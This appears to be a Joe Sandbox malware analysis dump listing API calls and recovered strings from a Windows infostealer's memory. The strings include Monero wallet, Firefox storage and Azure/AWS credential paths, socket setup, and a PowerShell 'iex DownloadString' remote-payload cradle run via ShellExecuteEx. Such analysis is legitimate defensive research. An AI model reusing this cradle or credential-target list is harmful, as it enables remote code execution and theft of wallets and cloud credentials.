                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Ucr;$>w}
                            • API String ID: 0-2669432049
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 9c*`
                            • API String ID: 0-3291459646
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: }
                            • API String ID: 0-917470332
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                             Similarity
                            • Opcode ID: 19a45ca91122dc986f6c16a5b9def569e71615d85b303cff34d153fc5148882c
                            • Instruction ID: e3831171581dd4acc532b861984c20e72c6379ba726d714d14e4db1ba5919232
                            • Opcode Fuzzy Hash: 19a45ca91122dc986f6c16a5b9def569e71615d85b303cff34d153fc5148882c
                            • Instruction Fuzzy Hash: 40216AF3E2222047F3985878CD5A3AB758697C0321F2B83798F68A7AC5DC7D9D4502C4
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 008F8776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F87AD
                            • lstrcpy.KERNEL32(?,00000000), ref: 008F87EA
                            • StrStrA.SHLWAPI(?,012FF5E8), ref: 008F880F
                            • lstrcpyn.KERNEL32(00B193D0,?,00000000), ref: 008F882E
                            • lstrlen.KERNEL32(?), ref: 008F8841
                            • wsprintfA.USER32 ref: 008F8851
                            • lstrcpy.KERNEL32(?,?), ref: 008F8867
                            • StrStrA.SHLWAPI(?,012FF600), ref: 008F8894
                            • lstrcpy.KERNEL32(?,00B193D0), ref: 008F88F4
                            • StrStrA.SHLWAPI(?,012FF840), ref: 008F8921
                            • lstrcpyn.KERNEL32(00B193D0,?,00000000), ref: 008F8940
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Similarity
                            • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                            • String ID: %s%s
                            • API String ID: 2672039231-3252725368
                            • Opcode ID: 0044eb1dea3c2fda408eb77990af5560522f1ae122003b5a4091ba1dd2c421dc
                            • Instruction ID: 42ebc862ab9b6e30ad29d7dde54769504cded80c7be30d2298485452dccadb86
                            • Opcode Fuzzy Hash: 0044eb1dea3c2fda408eb77990af5560522f1ae122003b5a4091ba1dd2c421dc
                            • Instruction Fuzzy Hash: 77F16072900158EFCB11DB68DD58AEAB7B9FF88700F908595F919E3250DF70AE41CBA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E1F9F
                            • lstrlen.KERNEL32(012F92F0), ref: 008E1FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 008E1FE3
                            • lstrlen.KERNEL32(0091179C), ref: 008E1FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E200E
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E2042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E204D
                            • lstrlen.KERNEL32(0091179C), ref: 008E2058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E2075
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E2081
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E20AC
                            • lstrlen.KERNEL32(?), ref: 008E20E4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E2104
                            • lstrcat.KERNEL32(00000000,?), ref: 008E2112
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E2139
                            • lstrlen.KERNEL32(0091179C), ref: 008E214B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E216B
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E2177
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E219D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E21A8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E21D4
                            • lstrlen.KERNEL32(?), ref: 008E21EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E220A
                            • lstrcat.KERNEL32(00000000,?), ref: 008E2218
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E2242
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E227F
                            • lstrlen.KERNEL32(012FDF80), ref: 008E228D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E22B1
                            • lstrcat.KERNEL32(00000000,012FDF80), ref: 008E22B9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E22F7
                            • lstrcat.KERNEL32(00000000), ref: 008E2304
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E232D
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008E2356
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E2382
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E23BF
                            • DeleteFileA.KERNEL32(00000000), ref: 008E23F7
                            • FindNextFileA.KERNEL32(00000000,?), ref: 008E2444
                            • FindClose.KERNEL32(00000000), ref: 008E2453
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                            • String ID:
                            • API String ID: 2857443207-0
                            • Opcode ID: a9fa67a670f378d8cda6cda6828020923073ee06f952107d5a529e3716e0040f
                            • Instruction ID: e46aa7963ae68d8ae8a4a1a245a19a3bfa662ef3bb4a7e2d70b460f9a4f7b72b
                            • Opcode Fuzzy Hash: a9fa67a670f378d8cda6cda6828020923073ee06f952107d5a529e3716e0040f
                            • Instruction Fuzzy Hash: AEE15E31A1129AABCB21EF6ADC89A9E77BDFF46300F444024F905E7251DF74EE418B91
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F65A5
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F65E0
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008F660A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6641
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6666
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F666E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6697
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Similarity
                            • API ID: lstrcpy$FolderPathlstrcat
                            • String ID: \..\
                            • API String ID: 2938889746-4220915743
                            • Opcode ID: 52f1a718404b6bbd8573cf7d6d9cfac8f17d166aea1b9c6ef84f41b9cf6ef75b
                            • Instruction ID: 6f31917cb23837d5c6f6ee214dda937fe3478ef287099bcfa8d4b0312fce9875
                            • Opcode Fuzzy Hash: 52f1a718404b6bbd8573cf7d6d9cfac8f17d166aea1b9c6ef84f41b9cf6ef75b
                            • Instruction Fuzzy Hash: 6AF1E47091125AAFCB21AF79C849ABE7BB8FF05300F448228F915E7251EB74DD61CB91
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F4503
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F4536
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F455E
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F4569
                            • lstrlen.KERNEL32(\storage\default\), ref: 008F4574
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F4591
                            • lstrcat.KERNEL32(00000000,\storage\default\), ref: 008F459D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F45C6
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F45D1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F45F8
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F4637
                            • lstrcat.KERNEL32(00000000,?), ref: 008F463F
                            • lstrlen.KERNEL32(0091179C), ref: 008F464A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F4667
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F4673
                            • lstrlen.KERNEL32(.metadata-v2), ref: 008F467E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F469B
                            • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 008F46A7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F46CE
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F4700
                            • GetFileAttributesA.KERNEL32(00000000), ref: 008F4707
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F4761
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F478A
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F47B3
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F47DB
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F480F
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                            • String ID: .metadata-v2$\storage\default\
                            • API String ID: 1033685851-762053450
                            • Opcode ID: 974dd84b71630dded6c2531441b0b71bcf5eb007193f389ed17a32ed9c6229e4
                            • Instruction ID: ca53be624d12bd60ef91fb3d11350f0e1a24b985e43c15106191cb9c9bed6a43
                            • Opcode Fuzzy Hash: 974dd84b71630dded6c2531441b0b71bcf5eb007193f389ed17a32ed9c6229e4
                            • Instruction Fuzzy Hash: 1CB1BC31A1129AABDB21BF79DD49AAF3BA8FF05700F006025F906E7251DF74DD418B92
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F5935
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 008F5964
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F5995
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F59BD
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F59C8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F59F0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F5A28
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F5A33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F5A58
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F5A8E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F5AB6
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F5AC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F5AE8
                            • lstrlen.KERNEL32(0091179C), ref: 008F5AFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F5B19
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F5B25
                            • lstrlen.KERNEL32(012FDFB0), ref: 008F5B34
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F5B57
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F5B62
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F5B8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F5BB8
                            • GetFileAttributesA.KERNEL32(00000000), ref: 008F5BBF
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F5C17
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F5C8D
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F5CB6
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F5CE9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F5D15
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F5D4F
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F5DAC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F5DD0
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2428362635-0
                            • Opcode ID: 6f82b8c205fa0e370d849b829820b43c69f35796f267f3975f21f5d40a276ae8
                            • Instruction ID: ddaf48ee0c4790854453e04ca7c5aad7b21ad29e3e9776e9cde1f956c6f92ff5
                            • Opcode Fuzzy Hash: 6f82b8c205fa0e370d849b829820b43c69f35796f267f3975f21f5d40a276ae8
                            • Instruction Fuzzy Hash: 3802EF71A0165AAFCB21EF79D889AAE7BB9FF44310F444128FA05E3251DB70DE41CB91
                            APIs
                              • Part of subcall function 008E1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008E1135
                              • Part of subcall function 008E1120: RtlAllocateHeap.NTDLL(00000000), ref: 008E113C
                              • Part of subcall function 008E1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 008E1159
                              • Part of subcall function 008E1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 008E1173
                              • Part of subcall function 008E1120: RegCloseKey.ADVAPI32(?), ref: 008E117D
                            • lstrcat.KERNEL32(?,00000000), ref: 008E11C0
                            • lstrlen.KERNEL32(?), ref: 008E11CD
                            • lstrcat.KERNEL32(?,.keys), ref: 008E11E8
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E121F
                            • lstrlen.KERNEL32(012F92F0), ref: 008E122D
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1251
                            • lstrcat.KERNEL32(00000000,012F92F0), ref: 008E1259
                            • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 008E1264
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1288
                            • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 008E1294
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E12BA
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E12FF
                            • lstrlen.KERNEL32(012FDF80), ref: 008E130E
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1335
                            • lstrcat.KERNEL32(00000000,?), ref: 008E133D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1378
                            • lstrcat.KERNEL32(00000000), ref: 008E1385
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E13AC
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 008E13D5
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1401
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E143D
                              • Part of subcall function 008FEFC0: lstrcpy.KERNEL32(00000000,?), ref: 008FEFF2
                            • DeleteFileA.KERNEL32(?), ref: 008E1471
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                            • String ID: .keys$\Monero\wallet.keys
                            • API String ID: 2881711868-3586502688
                            • Opcode ID: c2db7f3ae832286f8bd32ca5a03e7a9ac7b99a7413e08df1b6f04c1083b712ac
                            • Instruction ID: fa8ddabd59c9e31d0c1c0ff232ba29ec0fa3798e3190f6ea6b242d44b17c7e87
                            • Opcode Fuzzy Hash: c2db7f3ae832286f8bd32ca5a03e7a9ac7b99a7413e08df1b6f04c1083b712ac
                            • Instruction Fuzzy Hash: 79A1AF71A00296ABCB21EB7ADC89ADE7BB9FF46700F444024F905E7241DF74DE418B91
                            APIs
                            • memset.MSVCRT ref: 008FE920
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 008FE949
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FE97F
                            • lstrcat.KERNEL32(?,00000000), ref: 008FE98D
                            • lstrcat.KERNEL32(?,\.azure\), ref: 008FE9A6
                            • memset.MSVCRT ref: 008FE9E5
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 008FEA0D
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FEA3F
                            • lstrcat.KERNEL32(?,00000000), ref: 008FEA4D
                            • lstrcat.KERNEL32(?,\.aws\), ref: 008FEA66
                            • memset.MSVCRT ref: 008FEAA5
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 008FEAD1
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FEB00
                            • lstrcat.KERNEL32(?,00000000), ref: 008FEB0E
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 008FEB27
                            • memset.MSVCRT ref: 008FEB66
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                             • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$memset$FolderPathlstrcpy
                            • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 4067350539-3645552435
                            • Opcode ID: bd1051ddf52cff244186f7b682a47ebe7a0393f1f3bdaa72435dc10b6129f16c
                            • Instruction ID: 73aaeb0e07968fbbe6b81e5cae75825e619e6d5235db700b80dc636c8b17d28a
                            • Opcode Fuzzy Hash: bd1051ddf52cff244186f7b682a47ebe7a0393f1f3bdaa72435dc10b6129f16c
                            • Instruction Fuzzy Hash: D871C571E50269ABDB21EB74DC4AFED7778FF48700F4044A4B719EB280DEB09A848B55
                            APIs
                            • LoadLibraryA.KERNEL32(ws2_32.dll,?,008F73E4), ref: 009049F6
                            • GetProcAddress.KERNEL32(00000000,connect), ref: 00904A0C
                            • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 00904A1D
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00904A2E
                            • GetProcAddress.KERNEL32(00000000,htons), ref: 00904A3F
                            • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00904A50
                            • GetProcAddress.KERNEL32(00000000,recv), ref: 00904A61
                            • GetProcAddress.KERNEL32(00000000,socket), ref: 00904A72
                            • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00904A83
                            • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00904A94
                            • GetProcAddress.KERNEL32(00000000,send), ref: 00904AA5
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                             • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                            • API String ID: 2238633743-3087812094
                            • Opcode ID: a74d535c1ec04c20256cd921ed05057230117624249d995f97d8298c96545f6d
                            • Instruction ID: e7db10da332cfaf054f769f44af4b92e36e1e32817ce2e28f875d06db5775e8c
                            • Opcode Fuzzy Hash: a74d535c1ec04c20256cd921ed05057230117624249d995f97d8298c96545f6d
                            • Instruction Fuzzy Hash: 3311D672B96764FBC711DBA4AC1DADA3AB8BB89709386882AF551D3160DEB4C040DB50
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FBFA3
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FBFD6
                            • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 008FBFE1
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FC001
                            • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 008FC00D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FC030
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008FC03B
                            • lstrlen.KERNEL32(')"), ref: 008FC046
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FC063
                            • lstrcat.KERNEL32(00000000,')"), ref: 008FC06F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FC096
                            • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 008FC0B6
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FC0D8
                            • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 008FC0E4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FC10A
                            • ShellExecuteEx.SHELL32(?), ref: 008FC15C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                             • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 4016326548-898575020
                            • Opcode ID: fe6689b8d2ee140476a5ff39a9c01e70b0da55fe6265d327dd61e4aaf685460c
                            • Instruction ID: 21acf373824f6cae27e5670e82aeefe76af6c202e7d9bbf47e49920e8236d88d
                            • Opcode Fuzzy Hash: fe6689b8d2ee140476a5ff39a9c01e70b0da55fe6265d327dd61e4aaf685460c
                            • Instruction Fuzzy Hash: 2C619371E1029EABCB21AFB99D49AAF7BA8FF45700F044435E505E7202DF74CA528B91
                            APIs
                            • lstrcpy.KERNEL32 ref: 008FAD1F
                            • lstrlen.KERNEL32(012FF3D8), ref: 008FAD35
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FAD5D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008FAD68
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FAD91
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FADD4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008FADDE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FAE07
                            • lstrlen.KERNEL32(00914ADC), ref: 008FAE21
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FAE43
                            • lstrcat.KERNEL32(00000000,00914ADC), ref: 008FAE4F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FAE78
                            • lstrlen.KERNEL32(00914ADC), ref: 008FAE8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FAEAC
                            • lstrcat.KERNEL32(00000000,00914ADC), ref: 008FAEB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FAEE1
                            • lstrlen.KERNEL32(012FF3A8), ref: 008FAEF7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FAF1F
